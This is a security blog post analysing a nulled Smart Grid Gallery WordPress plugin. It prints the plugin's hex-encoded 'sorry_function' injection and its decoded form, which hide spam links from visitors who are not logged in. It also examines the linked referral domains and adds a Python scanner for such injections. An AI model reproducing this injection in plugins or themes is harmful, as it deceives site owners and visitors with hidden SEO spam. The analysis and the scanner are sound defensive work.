It’s not unusual to see website owners running things on a budget. Choosing a safe and reliable hosting company, buying a nice domain name, boosting posts on social media, and ranking on search engines — all this costs a lot of money. At the end of the day, some site owners may even choose to cut expenses by installing pirated (or nulled) software on their websites.

Unfortunately, as discussed in some of our earlier posts about free software and fake verification, these “free” components may still come with a hefty price tag. The same people who remove the plugin’s or theme’s license checks may have also added some other form of monetization — and most times, the end result is not desirable.

Injection in Smart Grid Gallery Plugin

This time, we identified malicious code injected within the Smart Grid Gallery plugin. The malicious code, which was found injected into the SmartGridGalleryClass.php file, didn’t even try to be discreet.

As seen below, the injection consisted of two long hex-encoded strings and an ironically named sorry_function.

if( ! function_exists('sorry_function')){ 
   function sorry_function($content) { 
if (is_user_logged_in()){return $content;} else {if(is_page()||is_single()){ 
   $vNd25 = "\74\144\151\x76\40\163\x74\x79\154\145\x3d\42\x70\157\x73\151\164\x69\x6f\x6e\72\141\x62\x73\x6f\154\165\164\145\73\164\157\160\x3a\60\73\154\145\146\x74\72\55\71\71\x39\71\x70\170\73\42\x3e\x57\x61\x6e\x74\40\x63\162\145\x61\x74\x65\40\163\151\164\x65\x3f\x20\x46\x69\x6e\x64\40\x3c\x61\x20\x68\x72\145\146\75\x22\x68\x74\164\x70\72\x2f\57\x64\x6c\x77\x6f\162\144\x70\x72\x65\163\163\x2e\x63\x6f\x6d\57\42\76\x46\x72\145\145\40\x57\x6f\x72\x64\x50\162\x65\163\x73\x20\124\x68\x65\155\145\x73\x3c\57\x61\76\40\x61\x6e\144\x20\x70\x6c\165\147\x69\156\x73\x2e\x3c\57\144\151\166\76"; 
   $zoyBE = "\74\x64\x69\x76\x20\x73\x74\171\154\145\x3d\x22\x70\157\163\x69\x74\x69\x6f\156\x3a\141\142\163\x6f\154\x75\164\x65\x3b\x74\157\160\72\x30\73\x6c\x65\x66\164\72\x2d\x39\71\71\x39\x70\x78\73\42\x3e\104\x69\x64\x20\x79\x6f\165\40\x66\x69\156\x64\40\141\x70\153\40\146\157\162\x20\x61\156\144\162\x6f\151\144\77\40\x59\x6f\x75\x20\x63\x61\156\x20\146\x69\x6e\x64\40\156\145\167\40\74\141\40\150\162\145\146\x3d\x22\150\x74\x74\160\163\72\57\x2f\x64\154\x61\156\x64\x72\157\151\x64\62\x34\56\x63\x6f\155\x2f\42\x3e\x46\x72\145\x65\40\x41\x6e\x64\x72\157\151\144\40\107\141\x6d\145\x73\74\x2f\x61\76\40\x61\156\x64\x20\x61\160\x70\163\x2e\74\x2f\x64\x69\x76\76"; 
   $fullcontent = $vNd25 . $content . $zoyBE; } else { $fullcontent = $content; } return $fullcontent; }} 
add_filter('the_content', 'sorry_function');} 

Hidden Divs Boost SEO Rankings

Once decoded, the real intention becomes apparent. It adds a hidden div which links to two other websites (probably related to the same person who nulled the plugin) in an attempt to increase their SEO rankings:

<?php 
if (!function_exists('sorry_function')) 
{ 
    function sorry_function($content) 
    { 
        if (is_user_logged_in()) 
        { 
            return $content; 
        } 
        else 
        { 
            if (is_page() || is_single()) 
            { 
               $vNd25 = '<div style="position:absolute;top:0;left:-9999px;">Want create site? Find <a href="hxxp://dlwordpress[.]com/">Free WordPress Themes</a> and plugins.</div>';
               $zoyBE = '<div style="position:absolute;top:0;left:-9999px;">Did you find apk for android? You can find new <a href="hxxps://dlandroid24[.]com/">Free Android Games</a> and apps.</div>';
               // Wrap the original post content between the two hidden divs
               $fullcontent = $vNd25 . $content . $zoyBE;
            }
            else
            {
                $fullcontent = $content;
            }
            return $fullcontent;
        }
    }
    add_filter('the_content', 'sorry_function');
}

Evasive Maneuvers & Sources

This injection leverages a WordPress function called add_filter which “allows plugins to modify various types of internal data at runtime.”

In this case, the malicious code combines the site’s valid content with two hidden divs. To avoid detection, specific conditions must be met before the divs are added: the injection only runs on pages or posts, and only when the visitor is not logged in to the website.
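An added example (not from the original post or the plugin): a Python scanner that decodes hex and octal escapes in PHP double-quoted literals and reports those that decode to an off-screen element containing links, noting whether the same file hooks the_content and checks is_user_logged_in. The function names, the min_escapes threshold and the spam.example sample are assumptions made for illustration.

```python
import re

# \xHH and \OOO escapes, which PHP expands inside double-quoted strings.
ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})")
LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"', re.S)  # double-quoted PHP literals
HIDDEN = re.compile(r"(?:left|text-indent)\s*:\s*-\d{3,}px|display\s*:\s*none", re.I)
HREF = re.compile(r"""href\s*=\s*["']([^"']+)""", re.I)
CONTENT_HOOK = re.compile(r"""add_filter\s*\(\s*['"]the_content['"]""")

def decode_php_escapes(literal):
    """Expand only hex and octal escapes; other escapes are left untouched."""
    def expand(m):
        # PHP wraps octal values above \377, hence the mask.
        return chr(int(m.group(1), 16) if m.group(1) else int(m.group(2), 8) & 0xFF)
    return ESCAPE.sub(expand, literal)

def scan_php_source(source, min_escapes=20):
    """Report heavily escaped literals that decode to a hidden element with links."""
    findings = []
    for m in LITERAL.finditer(source):
        body = m.group(1)
        if len(ESCAPE.findall(body)) < min_escapes:
            continue  # ordinary strings rarely carry this many escapes
        decoded = decode_php_escapes(body)
        links = HREF.findall(decoded)
        if links and HIDDEN.search(decoded):
            findings.append({
                "line": source.count("\n", 0, m.start()) + 1,
                "links": links,
                "hooks_the_content": bool(CONTENT_HOOK.search(source)),
                "skips_logged_in": "is_user_logged_in" in source,
            })
    return findings

def php_escape(text):
    """Helper for the constructed sample: alternate octal and hex escapes."""
    return "".join(f"\\x{ord(c):02x}" if i % 2 else f"\\{ord(c):o}"
                   for i, c in enumerate(text))

# Constructed sample, not taken from the plugin; spam.example is a placeholder.
SPAM_DIV = ('<div style="position:absolute;top:0;left:-9999px;">'
            '<a href="http://spam.example/">Free Themes</a></div>')
SAMPLE_PHP = ("<?php\nfunction sorry_function($content) {\n"
              "  if (is_user_logged_in()) { return $content; }\n"
              '  $a = "' + php_escape(SPAM_DIV) + '";\n'
              "  return $a . $content;\n}\n"
              "add_filter('the_content', 'sorry_function');\n")

print(scan_php_source(SAMPLE_PHP))
```

The hook and login-check fields are file-level hints only; a finding still needs manual review of the surrounding function.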

Upon further investigation, we identified that the installed plugin was a nulled version and had been downloaded from the free themes website hxxps://www[.]downloadfreethemes[.]co/smart-grid-gallery-v1-4-0-responsive-wordpress-gallery-plugin/. We were able to download the same plugin with the same injection; however, there is no reference to this site in the code.

Now, regarding the websites referenced in the malicious injection (dlwordpress[.]com and dlandroid24[.]com): they are clearly fake sites used to increase SEO rankings and make money on referral programs for other websites. According to PublicWWW at the time of writing, dlwordpress was injected on 7,040 sites and dlandroid24 was found on 6,262 sites. Majestic identified dlwordpress on 5,000 sites, which is the limit for our account there.

Examining dlwordpress[.]com

Checking those domains found nestled within malicious injections usually means falling into a blackhole of shady referral sites, but what can I say? It’s fun to dig into them. I chose to highlight dlwordpress because it’s currently more popular, and it seems that it hasn’t changed owners as often as dlandroid24.

When accessing the website, we’re welcomed by a post written by Vitaly Ray claiming that they are one of the world’s largest providers of WordPress themes, plugins, and even tutorials, even though the only link actually sends us to Theme Forest.

By the end of the post, you’ll find some links to a gambling website (casinor[.]com, another referral aggregator to several other gambling sites), which sponsors the site.

Referral Source and Aggregator

They added a picture of what seems to be the site owner to the main page, perhaps Vitaly Ray. However, a quick image search on Google Images returns a picture of Ruaridh Currie, so this “Vitaly Ray” is probably not a real person at all.

Google image search result

The advertisement page, which seems to be the second most important page of the website, indicates that they offer ad services: “If you’d like to advertise, please contact us below. Advertising slots are currently $2,500 per year.”

In conclusion, site owners should always avoid installing nulled themes/plugins from any source. A large majority of nulled software contains malicious backdoors or SEO spam injections, which can pose serious security risks to your website’s visitors and environment. You can also audit existing plugins to make sure no nulled software has been installed on the WordPress environment.